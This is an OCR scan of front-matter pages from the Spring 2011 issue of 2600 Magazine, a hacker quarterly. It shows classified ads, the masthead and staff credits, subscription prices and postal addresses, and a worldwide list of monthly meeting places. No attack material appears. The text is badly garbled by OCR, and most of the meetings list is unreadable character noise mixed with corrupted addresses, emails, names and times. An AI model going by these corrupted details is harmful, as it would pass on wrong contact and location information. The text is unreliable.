computer hacking). and general "nix sysadmin .com WE LIVE IN AN INCREASING AGE OF MISINFORMATION.. tech writing. P.hackershomepage. sweatshirts. The kit turns offTVs at 40 yards! And for professionals.com.com . get subway updates by sending "txtnyc" (space) "subup" to 368-638 (OOTNET). Sebastopol.com. along with the payphone's callable telephone number when: possible. Infoinject@gmail. Services PLEASE HIRE ME! I am a hacker in desperate need to break into the IT and infosec industry. al omar@stanfordalurnni.earth-intelligeoce. NY 11953. company is now bouncing back & expanding our service offerings (telecom included). of the people advertising here.bttp:/lis.

3T. volume 28 Issue J.O. and creating them in your own home is a very ingenious plan indeed. Jessica. Maxim . Middle Island.. Sugar Ray.t:gitta Jonsdottir RIP: Ed DcFelippis 261JO is written by members of the global hacker community. ___ Infrastructure Associate Editor .26()(). James. Revamp-It. phiber Broadcast Coordinator Layout and Design Skrarn " " " Juintz Cover Dabu Ch'wald ..1be world needs new hackers... and Canada .o.. We know what a lot of you have been up to. NY 11953-0752 USA (subs@26OO..ret Inspirational Music: Death Cab for Curi e. $50 corporate (C .com) The prier: is $15.s.. The folk.articles@2600 . You ClUJ order one Wdrly aJ ~re. (1987 only available in full back issue sets.. BUI have you thought about what these future innovators are going to w~ •••••• ••• •• ••••• •••••••• •• ••••••••• •• 261JO (/SSN 0749·3851. Page 6 4 . p. dot. Cheryl Wheeler.. WeU.. .P a g e 65 .. NY and additional mailing offices. You can be 8 part or this by sending your submissions to artIcles@2600.s at the 2600 clothing subsidiary have devised a brand new scheme to entice youngsters into the world of hacking at a far younger age than has ever been attempted ... 200120 10 at $6.& IRC Admins beave. 5161.. Don't worry. Chloe.. DJ Cam .. Shipping added to overseas orders. P..(Qj~~ ~~~~ B~~~I~~~~ml(rn~bD~ Editor-] o-Chief Emmanuel Goldstein ~ f1yko 4IiiiI. NY JJ780. it's cool.. Network Operations . YEARLY SUBSCRIPTIONS: u.. Joachim. 260() OfficelFax Line. in the following sizes: 12months. NY 11953-0752. Solomon Burke... NY 11953-0099 USA (lencrs@26OO. 1988-2000 at $2. Funds) Overseas.com.~~mJ~ . +16317512600 Copyright ~) 20 II.$34 indi vid ual . USPS # 003·176): Spring 20] I . 2 Flowerfield.. POSTMASTER: Send address changes to: 2600 P. $65 corporate Back issues available for 1984-1986 at $10 per year.. is published quarterly by 2(j()() Enterprises IIIC..50 per issue. or by writing to tne subscription address on the mIt page. rOd3nt Office Manager Tampruf Forum Admins Bunni3bum. Stig. James..com) LEITERS AND ARTlCLE SUBMISSIONS: 2(j()() Editorial Dept.4T. Periodical postage rates paid at St..2600 Magazine Spring 2011 .. David House. Suzanne Ciani.. and Youth Small SUBSCRIY110N CORRESPONDENCE: 2600 Subscription Dept ... The Killers . koz .. Bob Hardy css.... BOll 752. So here's what we're offering: two-color printing of the famous blue 00.15 per issue.TI.. Basil. 2600 Enterprises Inc. Box 752 Middle Island.. . St.co".. Box 99.O.$24 individual . Andreas Rudin. Bi..S.) Subject to availability.CQm or the postal address below. The Fasl Shout Outs: Oda Kvaal-Tanguay... on the front of 100% cotton black shirts for the wee ones.worry no more.. Middle Island.

-Jo: "n:J\1l..<_a".- court .... R~k OftIn: Woo d F .onbo Ilar.tlcwC'. 7 pm r ~ClwnPl"'''''''''''I~1 rT.. M. 1033 E S3nl 5t. 31110111 E'...I. boo1h 00 Widlow S4. So. _ . W.phono>..bburJlh: Panc-ra Bn::adoa BllId lXIlJrt 8t1hc Iowa SllIlC Unl'¥eR .. The OfllonIri>Ill'llb..AIlCEIY11l'lA B _ AIRS: Ri. iry Center Food Cou rt (in fl'Onl 01the llll!ty Qu<en).: MdhodCdfon.tTown M.t"'.pu. """. pm C'.A .a.llllUa Cafe.6J111 Loll Cdf« H""...8 pm SOI111t... II U E All _ _ lib pIOOl ... _ O ... 8 pm Spobno: Thn 50"" ".a- "I'oAw r. ..: The ..lOOO. de l a Cmge.u: I'i:::a::orz:a LcttIo in tronlof ~ FllirTnd< CofT l lroon.G~1criJ Fnob 51.. (NonIIS. 1912 B-.. ftoot . Rd.lraJTrain SUIli " lI... J·'~fr hau. _/0l..8 pm 1 ... Matht '" c.. at Ihc 1:'nd . JlaI1 . o..... U PuIt'r1oRId Wlcbi~: Rrvl:'n. ~rl II'Itc'rtock Rochella.La .tj ·. 114.700 IOanhCallnl_.. 6. . ..I ."""': The Y.... D. 6 pm CANADA AI.qr. C..JItlD~ : bc..8:30pm : C<ntnl Sub ..'.......6 pm PEIIU U ... _ : OwnplaIn MIllI roodooun.q. mWMictlir.2600 Magatine . Lixoll\ A~...al Unl.: i.91<6. upttaln from the main C:nlrara ...on Ux ...aJI food COW' IluTbburl: Po""" Bre..... loun....-.Y M. ~ 51... ~---~: CaIpry: EaI Clai..6 .: Buroel'l8oc*!Io II Oau~h S..vid's HOItl.tr.:'-'un.... 7 pm a. . Poypl:onn... pm Ae • . " _: I.lIlo--... 6 pm ~rom'.-..J_: .. :z.a\ E>.allby"" _ _C..... ..". Lund)' 1<JdlI"Jun.klut ut fil. 1IR. by Bu'B'L"f DENMAJIJ: A. uptWn .2A70\l/abuI Hill p>rcII..70 ..:t from "" PIIKc 1'1«1 p"...aIoCon_ :!nd.Un Pobd""....iOlkbylh< ~ ~ tbr rol b=d amthe Copitlolc_all. willi _ _ 7:30 po _ C111l'lA u... (.onc. .. ....hop.. O>-L..._ HIli "".U. : <he Ihmcl<J Rood5hoI>Pioi Ceol<t...7908 ~ I.'..nnfUir: B..1Jict CoIWTlbil) ~ : Squ il'l'i StWrnt Crnkr 1.....l1 f1o:w tocaJooW1.. Cofc. 9321 /W 11> .. NW pm . HUB 'bow lh< Kon.he P-tacl)o ....."..: St.: _ IOlllI""".. 31"' .\on Student Ctntcf (BuildlnltW20) d MIT in me 211d ftoor Ala.ay swion.11lU .. ~: M>rJIand s..J.t... Allaate: LcOOll Mall rood court .. 7 po ClZCH RErU II U C 1'tqJn: l<gcndo pub. r.. and Cbtny Sion <he ". 6 pm MflUphb: R.. ...C)' a:Alameda.. U nll'r....lIK N.... _ : OlI... . fJlAIICt: Canoes: P:alailo des Fnll.9 pm CaJUonIa Lao. COllallUC' IU OlopdSdd MIll...~~ l oomn f:JSW IWIb 5t and Pl'1 _ : Bacbpoa: c. 6 pm . Union S1at1on....r5poa:. J--... 7 pm IREL4ND Doblln: AI <he. S:30 pm by H/IIV. P\a1 "er. 6 pm. PloII"'pbiil.o . ~1'la.:.~ ... IS3 E S)rd 5•• bntwD:n 418 SIiIlcS. la CloiKac . ~ pClll ~nd Illobicl ol Col_bit 5 )010:-St (i n '-:nuton Row. Doauu In lb: &J... . SI. Ja.u... NaIIl_Mall ialllo and Cu\· fil.JOpm _ : Rorol..".. il. eampuso. M>ln St. Mall.........".. de GaulI<) In r_ ol llle Fum da Nord .. 71"" ~ A' 51_ Sr in Old loW... _.6 pm Thlnd_lm: Rick'. 14:W1 W Col(u Ave.pulll i.. Cotf.a.D STAn. ~ o. ~ : Tru:ad<tu SIloR:ioI ee.. CIwioar.: Gnrd-PIaoe (l'Iaon Owl. Ma. Aacoa": HuIUC!l BUI'JU. H_ Spo«. . nnar PI.. 7:30 pm KIlGUND ~"'''''pIlonl:bo .( ft""..1JI GIIi1lCE A _ <MIidethc bool"IRI'C PapbOtrriou <In die oamc.. 97\)1.. 2 D. 6 pm Nt:rlll:aLANIIS Ulndn: In front of the th. ht a...-: BS U SIu&nl Unioon UUU dl"l.l1 .il) 7 pn .I03 R """""' 7pm eoa. YllzjniaSl...cc an:a.... 7 pm TroIfl"lDr. - M-... . 7pm Odo: ...... s..":C f(' 8c1l1...aK.r 0...tI (. Mob.. one black SOIollh of Bm1r:6cldMall....l ... _ E_.. 6 .roll. 5:30 p:D 5-.. 01 ~ S Uniwm. Pr-.U1UCA _ .. 115 NW ~ ar...... Arbor.''' loud ...r of Palilolon and Slwmari...... ..Ixa: b« Di.1_ """" ""'"" from Ib< 1... 1 WALJI _~ InnerHMbrJt.i~ ~ leconb.. Pl ncn B::d. . ~'Ellr J~ ofTa-...... Houw . Bal... by llle Sali. OX .tW Un1<on Orj:ooi.. B.-. VilliSI1oppi' 1 CmIrt.. arr... ns Kinl · Tm_ 'KalIn. . wAnooioal by RinintAw. Ih...nlllOo" l id.. Spiallllldd' U_ _ . m.. 6:A S O~ Ri.'. _ (nnarl'\<:Qd.. 1I112nd S.. . - ot .... inaidcThc Ikn' dooo:10 PIaoedc b llq>ubliquo .-"" Roind Tolll... ...... nccUc an h AIlSTlUA" TUiIk Uni _~ Mi ll in !lit lock of G___ the rlXld court on the 2.. WbIlinp>n SI.. ). (213) : m-9S19..dnn....a r<n:t .. h &. Coil.. Pdorkd lood O>WI by lh< wI·S hot>\'OO.o ..II:~C. y I:tlllld(nrM UNC Owk1ttC')_ ~.1 or " _ Sl>ctIoct> Yi'l!nltT«b.s.. ' " . ...r•. 6:3Qpn' ToruMo: Pro: nmcs Cafe.... idr the miio Ila1ion. Barbiloni.. 8pm _"""obc.)8) """ 51.1 pm.. 8991 . 1 pm 8.·'I..a .. C.I..l• .. House..-.. La ~ rar lllr Ot. .6 _ YorIl Now YorIl: OIlpuup e.41SO 010>0lio: 111.-1". NOIlWAY ne .. R_.-. _ d : 1oI1i... 6 pm J. .....amo.....29QS in 1lx...: P>O tI<C"""" In .... :1300 5 GlelUtoneAile. Page 6 6 .K~ FlNUND _ .. lhe pa yphone ...lehans e Plu.Ol1cm 1nun uptta in in ge: Morlbon""" Solomon Pond Mill lhe Fay Union BuUdini.... un.. 7 pm S.. 7:30 pm N. B.... ~ <heal.....The upper . 1!n4 Walnul OJ'O"f': Rd..te-c Z'or:zCoIf..Collc-ZC' ud Spolina.")... H.lIowSolI .-. 1IOUlhC'''t (4D. "'.. bcB.... 7 pm 'OlllI..rr R4. 010:-. 7 pm 7:30 pm L........ Ames: Memorial Union Bu~ldjn~ food PlI.. ~ :c.....BIu< R. .£WZ£AUND in ' .I 2022 .lpta 1"...D01""- IloFn " ....... 6-301'" ~ Bu!I~ tuai Pl.ate (We hit M. 7pm -- " _ _ S'55 - YlrJlulI Art1.."...: J..anSI.: tolemnri. pool h.. Shepp!n. WIIwbury: Br-. N....C~n $1..:"'J'hE Bn::wnyl ap Uwh.. 613. UNJTY. Plnrra 8~ . llnI<n..6 pm ""11_.ytQn:Marien..ldc PaiL . Imide: main CIdnlnCe by bonk 01 pbo.clBD_:IiOQ.I . t)w J.bus: Ea'l..t. Stnlll. M-eb.. 7 pm IUin('&' 1 ~ .I_·.ood: UII1IcI and Noble In"'" D:M""Q' \IkM.. . 30IJl51 Surion. imide tht It ki l iO lCIaJ'11tap'lilduktcQ at'lo1lc nViin hall .. .. ..: 'Wd.... <hetolLX Li!nty II 4lh and E Sml'ananllo.:m.....".. 6 pm r=. I'Incnllll'Cld.. 6 pm Ind_puIls: Mo'l"..tcIL: Bc:nIcn. in dw GIUeri. DIoF: RegentS Plzu.PIaoe do ..- ..... Apu liar ).. (cJ.. IOOlIIIlIllIDod&c ... III Albeit S~ ~ lIoor... rOOt.....an To_o C'er1Cn" .. em.DJCffCDOD A--e. <heInn lido. 8oItoo : Strlll. 6pm ~: . Ok~a". a 'lOO I'l W_ _. 6 pm ~ M _: Bell 1<lnjIlliIbn_...a. !oI:lly. 7 pm lIaWlllI 8110: Prim Kuhio PI..oI 6cCGJd Soor. e a ... 5lalion ." cotTcc1. 6 pm 1'tIaII .!lorI:PII' l'Mie'. 6 pm N IIt.... 7:30 po R J8t(l ~ ~ . 7pm 1M CalI I'l.. nol<4.AudJaod e-...:. Buc'dn't!QIl frnlft(.r. IN _ !t..IAI _ _Quil:t -..~ 01 M. II. ..\l. -..olo.r.cadot _ 2AQO.._: Glcnbl'o::Jll..' Urcad.._ _ lobIIlood ooun..riaIIePU.. h..eo: SpUr _ ear•.. and BInWICO)..u... Mill M. PIDoII 177 K S.. jn ball ..1 S p* _ . 7 pn .IG ua. t'1. ~­ SL.~ Muoky 0uek .. s...r... WID<bor: Satal) '. PonnJaIwnJ<li lOOol"""" (Vunrikalu '''1 . _ ..ob. w_.0 : Golden "".Q'..lI ..."ol Hi"" Soand W-bnitt 51.. DI..rto "mo=rirlJ Jri... 6 pm in frgm of Sbun:l'J .O.$ol.. olq>.6pm H••lPlnt: SUnlIW's Sub Vill..... ol tlln _ ....Ibon LandonRd.j court near mini post 10•• of(I«'. Cenler.. -Oa .. 1 the foo-J courl -=n.t NobIc Q/c II 1\1111_ 51... Coff«.*....... City (o-tand 1'wII): OIll1lrl SU\hipilei on lhl! ft'nfl Stmc campw. jAj6 Wal em Rd..csj..._ ""'n.fe Centre Cata"m\ the ..l in II.... .:CDIkrc Marlul.. ft..: S"". 6 pm S"Tl'ZERLAND LaUAl'-: In fron1of ...l· .\ 5-.lJ1 Klptt'lrillj.Il1 _ _ _ ...- Cm:tR4.komlnlplm:. l.rooS Pa. ' :JQpm S._ _ 1l'IIdTUrtry . It NobW._ behind UW: lb)1'JA M.s.- 1- 0Uah. C.. AartU15 In lhc fat oomer of the 058 : calc in ehe rail .inSt.:Ilt'lcJO l1ar•• 'J Aa' lJfcll3 .. lido...- Cru: Cafe n..8pm Qonlab .... """kDl Too. 1!21000tS••6pm 1nJUIo AI. phonc: (Olm... "n AkD ron:J Mira.u1L Botlo HortllOlur. M..lII ofl SR-741. Care In Nctd".. .'79 AI. 6:JO1"". 8 pol M_ so.. 606ll'R 7 pm 1. Swtft DoIoo<a Walk. Id.ames &: NobIt: W ( II \he ~~ FaIk Empift!:MoIll.he " )42·9700...1un N. s..... ~ WdIosIo)o 51.. dwo . and e MU 110_".. 51.m .1 of the " iii.. 71~ WJorolo'•• 51 E. l< '....1 :)0 pm __ NClI1Ilc.'H' .lric:1 sMppinr:oenta'(CIQl1\et 0' I.... : Nitt.j-.".". II _ b C_bi11 U"""" ConualSUolJoo.Mi' fnJm tbc Indoor roua1ain . l oniatl Lann... 9S20:6~1 . ~ . 931 ~ N N.."I&lITlo.lrJCI Ki". 7 pm e-.. .. ruc ...

Sign up to vote on this title
UsefulNot useful